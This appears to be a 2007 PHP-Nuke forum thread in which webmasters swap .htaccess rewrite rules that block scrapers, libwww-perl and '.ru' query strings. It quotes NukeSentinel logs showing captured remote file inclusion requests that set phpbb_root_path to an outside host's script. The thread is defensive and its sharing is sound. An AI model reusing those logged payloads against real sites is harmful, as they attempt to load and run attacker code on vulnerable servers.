Htaccess Blocking

New Member Joined: Aug 18, 2005 Posts: 9

I want to get rid of this kind of multiple attacks via the htaccess file (sussefully blocked with your great Sentinel Smile

):

Code:

Date &amp; Time: 2007-12-14 05:52:00 CST GMT -0600


Blocked IP: 72.232.138.195


User ID: Anonymous (1)


Reason: Abuse-Filter


--------------------


User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)


Query String: xxx.xxxxxx.com/modules.php?name=Multiheadlines&rss=ShowInfo&url=http://www.stomol.ru/catalog/afa/azo/


Get String: www.xxxx.com/modules.php?name=Multiheadlines&rss=ShowInfo&url=http://www.stomol.ru/catalog/afa/azo/


Post String: www.xxxx.com/modules.php


Forwarded For: 72.232.138.195


Client IP: none


Remote Address: 85.91.102.138


Remote Port: 63504


Request Method: GET

What is the code for blocking that user agent or the domain *.ru in my htacces file?

Actually my htaccess rewrite section contains de following:

Code:

# -------------------------------------------


RewriteEngine on 


RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [OR]


RewriteCond %{HTTP_USER_AGENT} ^Wget  


RewriteRule ^.*$ http://127.0.0.1 [R,L]


#------------------------------------------------------------------

Thanks for Sentinel, phpnuke rules !!

registered · Posted: Sat Dec 15, 2007 3:29 pm

You could try something like

Code:




RewriteCond %{THE_REQUEST} (.ru)

My syntax may be off. Not 100% sure on this. Smile

Posted: Sun Dec 16, 2007 3:51 am

Thanks evaders!

You put me in the right direction, finally my rewritecond works, although the correct line is:

Code:

RewriteCond %{QUERY_STRING} \.ru

Posted: Sun Dec 16, 2007 7:07 am

I picked up this list a while back and throught I would throw this into the disscussion....
http://www.javascriptkit.com/howto/htaccess13.shtml

Code:

RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR] 


RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Custo [OR] 


RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR] 


RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR] 


RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR] 


RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR] 


RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR] 


RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR] 


RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR] 


RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR] 


RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR] 


RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR] 


RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR] 


RewriteCond %{HTTP_USER_AGENT} ^HMView [OR] 


RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR] 


RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR] 


RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR] 


RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR] 


RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR] 


RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR] 


RewriteCond %{HTTP_USER_AGENT} ^larbin [OR] 


RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR] 


RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR] 


RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR] 


RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR] 


RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR] 


RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR] 


RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR] 


RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR] 


RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR] 


RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR] 


RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR] 


RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR] 


RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR] 


RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR] 


RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR] 


RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR] 


RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Wget [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Widow [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Zeus 


RewriteRule ^.* - [F,L]

registered · Posted: Tue Dec 18, 2007 5:45 am

I would highly recommend you adding the following to this list:

RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [OR]
RewriteCond %{HTTP_USER_AGENT} ^NaverBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^Twiceler [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Yeti [NC,OR]

Especially the first four...

Posted: Tue Dec 18, 2007 5:59 am

Here is the updated list for all you Cut and Pasters....

Code:

RewriteCond %{QUERY_STRING} \.ru


RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR] 


RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR] 


RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [OR] 


RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [OR] 


RewriteCond %{HTTP_USER_AGENT} ^NaverBot [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Twiceler [NC,OR] 


RewriteCond %{HTTP_USER_AGENT} ^Yeti [NC,OR] 


RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR] 


RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Custo [OR] 


RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR] 


RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR] 


RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR] 


RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR] 


RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR] 


RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR] 


RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR] 


RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR] 


RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR] 


RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR] 


RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR] 


RewriteCond %{HTTP_USER_AGENT} ^HMView [OR] 


RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR] 


RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR] 


RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR] 


RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR] 


RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR] 


RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR] 


RewriteCond %{HTTP_USER_AGENT} ^larbin [OR] 


RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR] 


RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR] 


RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR] 


RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR] 


RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR] 


RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR] 


RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR] 


RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR] 


RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR] 


RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR] 


RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR] 


RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR] 


RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR] 


RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR] 


RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR] 


RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR] 


RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Wget [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Widow [OR] 


RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR] 


RewriteCond %{HTTP_USER_AGENT} ^Zeus

Posted: Tue Dec 18, 2007 1:21 pm

Nice list, thanks a lot. I think the htaccess blocking is a great pre-filter for Sentinel Smile

Worker Joined: Nov 17, 2006 Posts: 222

Thanks for sharing guys

Posted: Fri Dec 21, 2007 8:20 am

Does it work if only the root dir .htaccess has these blocks? Or is it required for all .htaccess in all dirs?

Posted: Fri Dec 21, 2007 9:20 am

.htaccess is "inherited" all the way down the "tree". So, as long as you do not override a particular statement / setting down below, it will apply.

Regular Joined: Mar 14, 2005 Posts: 91

montego wrote:

I would highly recommend you adding the following to this list:

RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [OR]
RewriteCond %{HTTP_USER_AGENT} ^NaverBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^Twiceler [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Yeti [NC,OR]

Especially the first four...

Nice one...
I've seen the Twiceler and Yeti but didn't know they weren't good bots.
So where do we find out if a bot is bad?

Posted: Sat Dec 22, 2007 5:38 pm

*NukeSentinel Newbie here Embarassed

Could i just put this in my .htaccess file below the

Code:

# -------------------------------------------


# Start of NukeSentinel(tm) DENY FROM area


# -------------------------------------------

part?

I know it has nothing to do with NS particularly but dunno if it could mess things up? + How do i check if this would be working correctly?

Posted: Sat Dec 22, 2007 7:52 pm

warren-the-ape, no, you CANNOT put these after those lines. I would suggest before those comments. Edit: Actually, thinking about that, you technically "could", but it would be best if you just put it above.

gotcha, I should probably have removed those two from the file. They were not obeying my robots.txt and I personally do not like that, so, they get banned... No strike1, strike2... Smile

Only registered users can see links on this board! Get registered or login! is a handy site, but I also just Google for it and usually end up finding a wealth of info.

Posted: Sun Dec 23, 2007 8:42 am

Thnx montego Very Happy

Btw, I already received 8 'blocked abuse' emails within 2 days, so it seems like sentinel is doing its job Cool

They are similar as the ones desribed by sarmient;

Code:

Date &amp; Time: 2007-12-22 04:06:08 CET GMT +0100


Blocked IP: 83.143.84.115


User ID: Anonymous (1)


Reason: Abuse-Filter


--------------------


User Agent: libwww-perl/5.79


Query String: www.mysite.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.crystalsspa.com/images/readme.txt?


Get String: www.mysite.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.crystalsspa.com/images/readme.txt?


Post String: www.mysite.com/modules/Forums/admin/admin_db_utilities.php


Forwarded For: none


Client IP: none


Remote Address: 83.143.84.115


Remote Port: 55911


Request Method: GET

Code:

Date &amp; Time: 2007-12-23 15:04:46 CET GMT +0100


Blocked IP: 81.52.241.10


User ID: Anonymous (1)


Reason: Abuse-Filter


--------------------


User Agent: libwww-perl/5.808


Query String: mysite.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?


Get String: mysite.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?


Post String: mysite.com/modules/Forums/admin/admin_styles.php


Forwarded For: none


Client IP: none


Remote Address: 81.52.241.10


Remote Port: 53788


Request Method: GET

I've set my 'Filters Blockers settings' to; email & default page
But is this enough or should i block them as well?

I also got 1 mail from a blocked member where his entire post content was listed, i think he probably made a html mistake or something like that.

EDIT: If i configure it to block (email, block, default page) those attacks as well, would that classify as a 'shameful hacker caught' ?

Posted: Sun Dec 23, 2007 10:08 am

Quote:

They were not obeying my robots.txt and I personally do not like that, so, they get banned

I'm surprised neither them have fell into my bot trap. I added an entry to the robots.txt that points to a page that will ban them immediately(via Sentinel).

Posted: Sun Dec 23, 2007 2:57 pm

I daren't post my htaccess lol the forum might throw a fit.
You might want to research one that's doing the rounds at the moment;
MJ12 (Majestic12) - there is a good bot my this name but one is usually spoofed and the stuff it is searching for doesn't exist so basically it is looking for exploits.

Regular Joined: Apr 09, 2004 Posts: 87 Location: UK

Perhaps I did something wrong but after cut-n-pasting what Dawg posted above, I'm still getting these script-kiddies attack from both an .ru domain and using libwww-perl.

Did I miss something?

User Agent: libwww-perl/5.803
Query String: a1nul.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
Get String: a1nul.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
Post String: a1nul.com/modules/Forums/admin/admin_db_utilities.php
Forwarded For: none
Client IP: none
Remote Address: 69.33.187.52
Remote Port: 60337
Request Method: GET

Posted: Mon Dec 24, 2007 7:51 am

sowsteady, I think you may be missing the last line of the list (Dawg did not have it in his updated list):

RewriteRule ^.*$ http://127.0.0.1 [R,L]

Make sure this is at the end of your list. I just think you did not complete the rewrite so they were just still passing into nuke.

Posted: Mon Dec 24, 2007 9:01 am

Oh right, I'll go fix it. Thanks Montego!

Posted: Wed Dec 26, 2007 9:35 am

no problem. Cheers